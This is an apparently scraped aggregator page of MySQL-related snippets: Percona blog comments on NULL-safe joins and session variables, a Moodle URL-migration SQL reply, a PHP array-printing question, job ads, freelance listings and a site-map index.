
          Comment on Finding Table Differences on Nullable Columns Using MySQL Generated Columns by Guilhem Bichot      Cache   Translate Page      
Hello. The original problem, that two rows with a same NULL value are not considered equal (and thus are false positives in the first difference-finding query), is because the USING clause implicitely translates to equality conditions, which reject NULLs; it can be solved by using a clause with the operator; instead of: sbtest1 a left join sbtest2 b using (k,c,pad) where b.id is null, do sbtest1 a left join sbtest2 b on a.kb.k and a.cb.c and a.padb.pad where b.id is null . Guilhem (MySQL dev team)
          Comment on PostgreSQL Monitoring: Set Up an Enterprise-Grade Server (and Sign Up for Webinar Weds 10/10…) by Paul      Cache   Translate Page      
Hi Avinash/Nando/Jobin, maybe I wasn't able to catch up with DDL's but what's the best way to handle DDL like in MySQL, we can use pt-online-schema-change and avoid large replica lag. Is there a way without doing downtime in Postgres or is there a tool Percona is writing right now that would be equivalent to pt-onine-schema-change? Looking forward on this.
          Comment on Persistence of autoinc fixed in MySQL 8.0 by Federico Razzoli      Cache   Translate Page      
In my understanding, replacing REPLACE with DELETE + INSERT should also avoid the problem. Correct? If so, and if adding the DELETE is a problem for developers, DELETE could also be added in a trigger.
          Comment on Announcement: Experimental Build of Percona XtraBackup 8.0 by jtomaszon      Cache   Translate Page      
Wonder why we are not doing backward compatible with previous versions. Not so difficult to check with MySQL version we are trying to backup and just use one or the other.
          Comment on Finding Table Differences on Nullable Columns Using MySQL Generated Columns by David Ducos      Cache   Translate Page      
Hi Jouni, thank you for your comment! I chose MD5 for no particular reason, as later in the customers process, there is a second validation. Feel free to choose any hash function that suit the best for your needs. Cheers
          Comment on MySQL Session variables and Hints by Oğuzhan Hoca      Cache   Translate Page      
The other part is session variable. If you know query is going to require large sort you can do SET sort_buffer_size=50000000 before executing query and SET sort_buffer_size=DEFAULT after executing the query.
          Comment on MySQL Session variables and Hints by Zelal Keleş      Cache   Translate Page      
thanks for this article i use it my website
          Comment on MySQL Session variables and Hints by Serdar Yüce      Cache   Translate Page      
thanks for this article.
          Comment on MySQL Session variables and Hints by Anaşehir Koleji      Cache   Translate Page      
i use it my project las time
          Comment on MySQL Session variables and Hints by Güzin Başcı      Cache   Translate Page      
thanks for article. i use it some project
          Comment on MySQL 5.7 By Default 1/3rd Slower Than 5.6 When Using Binary Logs by Meral Sönmezer      Cache   Translate Page      
great post, thanks for this article.
          Re: URLs changed via DB query not reflected in course      Cache   Translate Page      
by Steve Bluck.  

Hi Ken,

I'll run through the suggestions in the blog but in the meantime the MySQL commands we ran for tables identified as having our site URL were:

UPDATE  mdl_page SET content = REPLACE(content, 'http://[site]/', 'https://[site]/');

UPDATE  mdl_page SET content = REPLACE(content, 'http://[site]', 'https://[site]');

So both trailing slash & non-trailing slash were accounted for. We found that the HTTPS replacement tool did all URLs instead of just our site. Which lead to broken links for sites that hadn't moved to HTTPS.  Not sure which is worse now!


          very professional server administrator and expert presta shop      Cache   Translate Page      
i am looking professional server administrator so bette that knows how to work well And answer problems quickly And knows Presta Shop And an expert at Prestashop who knows how to build models and fix ... (Budget: $2 - $45 USD, Jobs: HTML, MySQL, PHP, Prestashop)
          Web Application Developer - Kanetix Ltd. - Toronto, ON      Cache   Translate Page      
Have advanced database knowledge in at least one of Oracle, MS SQL or MySQL. Join Canada's fastest-growing internet technology company in the insurance industry...
From Indeed - Tue, 09 Oct 2018 20:49:55 GMT - View all Toronto, ON jobs
          Senior Software Engineer, Java - Incognito Software - Ottawa, ON      Cache   Translate Page      
Experience configuring PostgreSQL, MySQL, and/or Oracle. We are looking for a Senior Java Developer for designing and implementing backend solutions based on...
From Incognito Software - Wed, 03 Oct 2018 23:58:47 GMT - View all Ottawa, ON jobs
          Small issue trying to print array values inside for loop [Solved]      Cache   Translate Page      

@computerbarry wrote:

Hi all

I’ve become a little stuck after I changed some of my code. Can’t figure out what I have changed because the coma’s and double quotes are causing some errors in the for loop.

When I load the page all I can see is:

ARRAY[‘MENU_NAME’] ARRAY[‘MENU_NAME’] ARRAY[‘MENU_NAME’]

How do I properly print the for loop so it displays the values correctly?

$stmtt = $mysqli->prepare("SELECT menu_name, menu_link, menu_class FROM menu");
$stmtt->bind_result($menu_name, $menu_link, $menu_class);
$stmtt->execute();
$stmtt->store_result();

$lnks = array();
while($stmtt->fetch()){
    $lnks[] = array(
        'menu_name' => $menu_name,
        'menu_link' => $menu_link,
        'menu_class' => $menu_class
    );
}

print "<nav>";
    print "<div>";
      print "<ul>";
        for($i = 0; $i < count($lnks); $i++):
            print "<li class='$lnks[$i]['menu_class']'><a href='/$lnks[$i]['menu_link']' class='$lnks[$i]['menu_class']'>$lnks[$i]['menu_name']</a></li>";
        endfor;
      print "</ul>";
    print "</div>";
print "</nav>";

Thanks,
Barry

Posts: 10

Participants: 5

Read full topic


          Devart Excel Add-ins 1.8      Cache   Translate Page      
Devart Excel Add-ins allow you to use powerful Excel capabilities for processing and analysis of data from cloud applications and relational databases, edit external data as usual excel spreadsheets and save data changes back to the data source you have imported them from. Key Features: Powerful Data Import With Devart Excel Add-ins you can precisely configure what data to load into the document. Select objects and columns and set complex data filters. If this is not enough, all the power of SQL is to your service, not only for relational databases, but for cloud applications too. Quick Data Refresh The main Devart Excel Add-ins benefit is an ability to periodically get the actual data from different data sources to Excel with a single click without repeating the whole import operation each time. Refresh data in your workbook easily whenever you want. Easy Data Modification You can edit data in Excel just like you usually do it, add or delete rows, modify cell values, etc. Use full power of Excel to perform mass data update, insert, and delete operations against your data source. After you finished editing, just click Commit and the changes will be posted back to the data source. List of supported data sources: - Oracle Database - SQL Server - MySQL - PostgreSQL - SQLite - Salesforce - Dynamics CRM - Zoho CRM - SugarCRM - DB2
          Développeur .NET Full Stack - Bedard Ressources - Laval, QC      Cache   Translate Page      
Expérience avec des BD (MySQL, SQL Server). Ne cherchez pas ailleurs, ce poste est offert en exclusivité chez Bédard Ressources !... $50,000 - $75,000 a year
From Bedard Ressources - Wed, 25 Jul 2018 19:14:52 GMT - View all Laval, QC jobs
          Percona Monitoring and Management (PMM) 1.15.0 Is Now Available      Cache   Translate Page      
Percona Monitoring and Management

Percona Monitoring and Management (PMM) is a free and open-source platform for managing and monitoring MySQL® and MongoDB® performance. You can run PMM in your own environment for maximum security and reliability. It provides thorough time-based analysis for MySQL® and MongoDB® servers to ensure that your data works as efficiently as possible. This release offers two new features for both the MySQL Community and Percona Customers: […]

The post Percona Monitoring and Management (PMM) 1.15.0 Is Now Available appeared first on Percona Database Performance Blog.


          Instrumenting Read Only Transactions in InnoDB      Cache   Translate Page      
Instrumenting read only transactions MySQL

Probably not well known but quite an important optimization was introduced in MySQL 5.6 – reduced overhead for “read only transactions”. While usually by a “transaction” we mean a query or a group of queries that change data, with transaction engines like InnoDB, every data read or write operation is a transaction. Now, as a […]

The post Instrumenting Read Only Transactions in InnoDB appeared first on Percona Database Performance Blog.


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Comment on Spring MVC Hibernate MySQL Integration CRUD Example Tutorial by herbert      Cache   Translate Page      
a couple of features for this project work fine but also some aint okey,try reviewing it
          redesign dashboard      Cache   Translate Page      
i will like to redesign my user dashboard of my website to a more modernize user dashboard interface (Budget: $10 - $50 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Migration of 200 websites from sixteen Redhat 3.0 to four CentOS 7 Servers -- 2      Cache   Translate Page      
Project description: Migration of 200 web sites from sixteen Redhat 3.0 to four CentOS 7 servers. Scope: - 200 websites running on: o apache o html (http/https) o php o perl o tomcat o mysql... (Budget: $250 - $750 CAD, Jobs: Apache, HTML, MySQL, Perl, PHP)
          Symphony website with articles, contributor page and login      Cache   Translate Page      
Hi, im interested in someone that have experience with Symphony, www.getsymphony.com/. I want you to modify the comment section in symphony and modify a little bit of article interface, make members and... (Budget: $30 - $250 USD, Jobs: HTML, MySQL, PHP, Symfony PHP)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          PHP - Module Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
Total 6 – 8 years related experience in IT • Professional experience in PHP/MySQL (LAMP) stack development – 5 years ( 7 for senior) • Professional experience...
From Mphasis - Thu, 27 Sep 2018 12:28:53 GMT - View all Bengaluru, Karnataka jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Praktikum Ruby Software-Entwickler mit Deutschkenntnissen (C1/C2) App-Agentur Karlsruhe (m/w)      Cache   Translate Page      
Jobangebot: Mehr Infos und bewerben unter: https://www.campusjaeger.de/jobs/519?s=18101178+ Für ein spannendes Projekt suchen wir einen motivierten Praktikanten im Bereich Webentwicklung.+ Wen suchen wir? * Du bringst Erfahrung von Internet-Technologien und Protokollen, wie z.B. HTML5, XML, CSS3 und JavaScript (jQuery, ..) sowie Bootstrap mit und bist bei neuen Technologien immer am Zahn der Zeit. * Du kennst dich mit SQL und NoSQL Datenbanken (z.B. MySQL, Redis, MongoDB) und mit den neusten Deployment Werkzeugen und Versionskontrollsystemen wie z.B. Git und Continuous Integration aus. * Du hast Spaß daran selbständig, akkurat und mit 'Clean ... 0 Kommentare, 41 mal gelesen.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Magento API Troubleshooting      Cache   Translate Page      
We have issues with Magento 1.x API connecting to external services. Need someone to fix the same urgently. (Budget: $30 - $250 USD, Jobs: API, Magento, MySQL, PHP, Shopping Carts)
          make a search by numberplate and match product to vehicle      Cache   Translate Page      
I want to look like this page https://www.thansen.dk/bil/n-487801686/#autopartsManuel Where you are able to search by numberplate and it matches the products to vehicle Page it has to be done on: www.bilkrog.dk... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, Software Architecture, XML)
          دیدگاه‌ها برای آشنایی با نرم افزار NODE RED اینترنت اشیاء + راه اندازی با پریسا پوربلورچیان      Cache   Translate Page      
سلام از توجه شما ممنونم. با توجه به اینکه آموزش های mysql در سایت منتشر نشده است، باید منتظر باشید تا در بخش های بعدی آموزش کار با نرم افزار نود رد به آن بپردازیم. از همین طریق پیگیری نمایید. پس از انتشار اطلاع رسانی خواهد شد.
          دیدگاه‌ها برای آموزش کار با نرم افزار اینترنت اشیاء Node-RED – بخش اول با پریسا پوربلورچیان      Cache   Translate Page      
سلام از توجه شما ممنونم. با توجه به اینکه آموزش های mysql در سایت منتشر نشده است، باید منتظر باشید تا در بخش های بعدی آموزش کار با نرم افزار نود رد به آن بپردازیم. از همین طریق پیگیری نمایید. پس از انتشار اطلاع رسانی خواهد شد.
          make a search by numberplate and match product to vehicle      Cache   Translate Page      
I want to look like this page https://www.thansen.dk/bil/n-487801686/#autopartsManuel Where you are able to search by numberplate and it matches the products to vehicle Page it has to be done on: www.bilkrog.dk... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, Software Architecture, XML)
          Application modification      Cache   Translate Page      
I have the email marketing application that I need to be modified its got limited users 5 I need it to have unlimited users and I need it to have the frontend where users can sign up the application is... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          make a search by numberplate and match product to vehicle      Cache   Translate Page      
I want to look like this page https://www.thansen.dk/bil/n-487801686/#autopartsManuel Where you are able to search by numberplate and it matches the products to vehicle Page it has to be done on: www.bilkrog.dk... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, Software Architecture, XML)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Application modification      Cache   Translate Page      
I have the email marketing application that I need to be modified its got limited users 5 I need it to have unlimited users and I need it to have the frontend where users can sign up the application is... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          一个简单的分布式事务系统的实现      Cache   Translate Page      
一个简单的分布式事务系统的实现(订单系统) 背景:公司最早的一个版本的订单管理,是通过PHP+mysql的方案去实现的,这样会有什么问题呢,假设如果放到一个实例里面,全部用一个单机事务去解决,这样是能比较方便的解决数据一致性问题。但是存在两个问题,一是无法进行多实例部署,用户量增长以后,无法快速应对。二是,...
          Développeur .NET Full Stack - Bedard Ressources - Laval, QC      Cache   Translate Page      
Expérience avec des BD (MySQL, SQL Server). Ne cherchez pas ailleurs, ce poste est offert en exclusivité chez Bédard Ressources !... $50,000 - $75,000 a year
From Bedard Ressources - Wed, 25 Jul 2018 19:14:52 GMT - View all Laval, QC jobs


Next Page: 10000

Site Map 2018_01_14
Site Map 2018_01_15
Site Map 2018_01_16
Site Map 2018_01_17
Site Map 2018_01_18
Site Map 2018_01_19
Site Map 2018_01_20
Site Map 2018_01_21
Site Map 2018_01_22
Site Map 2018_01_23
Site Map 2018_01_24
Site Map 2018_01_25
Site Map 2018_01_26
Site Map 2018_01_27
Site Map 2018_01_28
Site Map 2018_01_29
Site Map 2018_01_30
Site Map 2018_01_31
Site Map 2018_02_01
Site Map 2018_02_02
Site Map 2018_02_03
Site Map 2018_02_04
Site Map 2018_02_05
Site Map 2018_02_06
Site Map 2018_02_07
Site Map 2018_02_08
Site Map 2018_02_09
Site Map 2018_02_10
Site Map 2018_02_11
Site Map 2018_02_12
Site Map 2018_02_13
Site Map 2018_02_14
Site Map 2018_02_15
Site Map 2018_02_15
Site Map 2018_02_16
Site Map 2018_02_17
Site Map 2018_02_18
Site Map 2018_02_19
Site Map 2018_02_20
Site Map 2018_02_21
Site Map 2018_02_22
Site Map 2018_02_23
Site Map 2018_02_24
Site Map 2018_02_25
Site Map 2018_02_26
Site Map 2018_02_27
Site Map 2018_02_28
Site Map 2018_03_01
Site Map 2018_03_02
Site Map 2018_03_03
Site Map 2018_03_04
Site Map 2018_03_05
Site Map 2018_03_06
Site Map 2018_03_07
Site Map 2018_03_08
Site Map 2018_03_09
Site Map 2018_03_10
Site Map 2018_03_11
Site Map 2018_03_12
Site Map 2018_03_13
Site Map 2018_03_14
Site Map 2018_03_15
Site Map 2018_03_16
Site Map 2018_03_17
Site Map 2018_03_18
Site Map 2018_03_19
Site Map 2018_03_20
Site Map 2018_03_21
Site Map 2018_03_22
Site Map 2018_03_23
Site Map 2018_03_24
Site Map 2018_03_25
Site Map 2018_03_26
Site Map 2018_03_27
Site Map 2018_03_28
Site Map 2018_03_29
Site Map 2018_03_30
Site Map 2018_03_31
Site Map 2018_04_01
Site Map 2018_04_02
Site Map 2018_04_03
Site Map 2018_04_04
Site Map 2018_04_05
Site Map 2018_04_06
Site Map 2018_04_07
Site Map 2018_04_08
Site Map 2018_04_09
Site Map 2018_04_10
Site Map 2018_04_11
Site Map 2018_04_12
Site Map 2018_04_13
Site Map 2018_04_14
Site Map 2018_04_15
Site Map 2018_04_16
Site Map 2018_04_17
Site Map 2018_04_18
Site Map 2018_04_19
Site Map 2018_04_20
Site Map 2018_04_21
Site Map 2018_04_22
Site Map 2018_04_23
Site Map 2018_04_24
Site Map 2018_04_25
Site Map 2018_04_26
Site Map 2018_04_27
Site Map 2018_04_28
Site Map 2018_04_29
Site Map 2018_04_30
Site Map 2018_05_01
Site Map 2018_05_02
Site Map 2018_05_03
Site Map 2018_05_04
Site Map 2018_05_05
Site Map 2018_05_06
Site Map 2018_05_07
Site Map 2018_05_08
Site Map 2018_05_09
Site Map 2018_05_15
Site Map 2018_05_16
Site Map 2018_05_17
Site Map 2018_05_18
Site Map 2018_05_19
Site Map 2018_05_20
Site Map 2018_05_21
Site Map 2018_05_22
Site Map 2018_05_23
Site Map 2018_05_24
Site Map 2018_05_25
Site Map 2018_05_26
Site Map 2018_05_27
Site Map 2018_05_28
Site Map 2018_05_29
Site Map 2018_05_30
Site Map 2018_05_31
Site Map 2018_06_01
Site Map 2018_06_02
Site Map 2018_06_03
Site Map 2018_06_04
Site Map 2018_06_05
Site Map 2018_06_06
Site Map 2018_06_07
Site Map 2018_06_08
Site Map 2018_06_09
Site Map 2018_06_10
Site Map 2018_06_11
Site Map 2018_06_12
Site Map 2018_06_13
Site Map 2018_06_14
Site Map 2018_06_15
Site Map 2018_06_16
Site Map 2018_06_17
Site Map 2018_06_18
Site Map 2018_06_19
Site Map 2018_06_20
Site Map 2018_06_21
Site Map 2018_06_22
Site Map 2018_06_23
Site Map 2018_06_24
Site Map 2018_06_25
Site Map 2018_06_26
Site Map 2018_06_27
Site Map 2018_06_28
Site Map 2018_06_29
Site Map 2018_06_30
Site Map 2018_07_01
Site Map 2018_07_02
Site Map 2018_07_03
Site Map 2018_07_04
Site Map 2018_07_05
Site Map 2018_07_06
Site Map 2018_07_07
Site Map 2018_07_08
Site Map 2018_07_09
Site Map 2018_07_10
Site Map 2018_07_11
Site Map 2018_07_12
Site Map 2018_07_13
Site Map 2018_07_14
Site Map 2018_07_15
Site Map 2018_07_16
Site Map 2018_07_17
Site Map 2018_07_18
Site Map 2018_07_19
Site Map 2018_07_20
Site Map 2018_07_21
Site Map 2018_07_22
Site Map 2018_07_23
Site Map 2018_07_24
Site Map 2018_07_25
Site Map 2018_07_26
Site Map 2018_07_27
Site Map 2018_07_28
Site Map 2018_07_29
Site Map 2018_07_30
Site Map 2018_07_31
Site Map 2018_08_01
Site Map 2018_08_02
Site Map 2018_08_03
Site Map 2018_08_04
Site Map 2018_08_05
Site Map 2018_08_06
Site Map 2018_08_07
Site Map 2018_08_08
Site Map 2018_08_09
Site Map 2018_08_10
Site Map 2018_08_11
Site Map 2018_08_12
Site Map 2018_08_13
Site Map 2018_08_15
Site Map 2018_08_16
Site Map 2018_08_17
Site Map 2018_08_18
Site Map 2018_08_19
Site Map 2018_08_20
Site Map 2018_08_21
Site Map 2018_08_22
Site Map 2018_08_23
Site Map 2018_08_24
Site Map 2018_08_25
Site Map 2018_08_26
Site Map 2018_08_27
Site Map 2018_08_28
Site Map 2018_08_29
Site Map 2018_08_30
Site Map 2018_08_31
Site Map 2018_09_01
Site Map 2018_09_02
Site Map 2018_09_03
Site Map 2018_09_04
Site Map 2018_09_05
Site Map 2018_09_06
Site Map 2018_09_07
Site Map 2018_09_08
Site Map 2018_09_09
Site Map 2018_09_10
Site Map 2018_09_11
Site Map 2018_09_12
Site Map 2018_09_13
Site Map 2018_09_14
Site Map 2018_09_15
Site Map 2018_09_16
Site Map 2018_09_17
Site Map 2018_09_18
Site Map 2018_09_19
Site Map 2018_09_20
Site Map 2018_09_21
Site Map 2018_09_23
Site Map 2018_09_24
Site Map 2018_09_25
Site Map 2018_09_26
Site Map 2018_09_27
Site Map 2018_09_28
Site Map 2018_09_29
Site Map 2018_09_30
Site Map 2018_10_01
Site Map 2018_10_02
Site Map 2018_10_03
Site Map 2018_10_04
Site Map 2018_10_05
Site Map 2018_10_06
Site Map 2018_10_07
Site Map 2018_10_08
Site Map 2018_10_09
Site Map 2018_10_10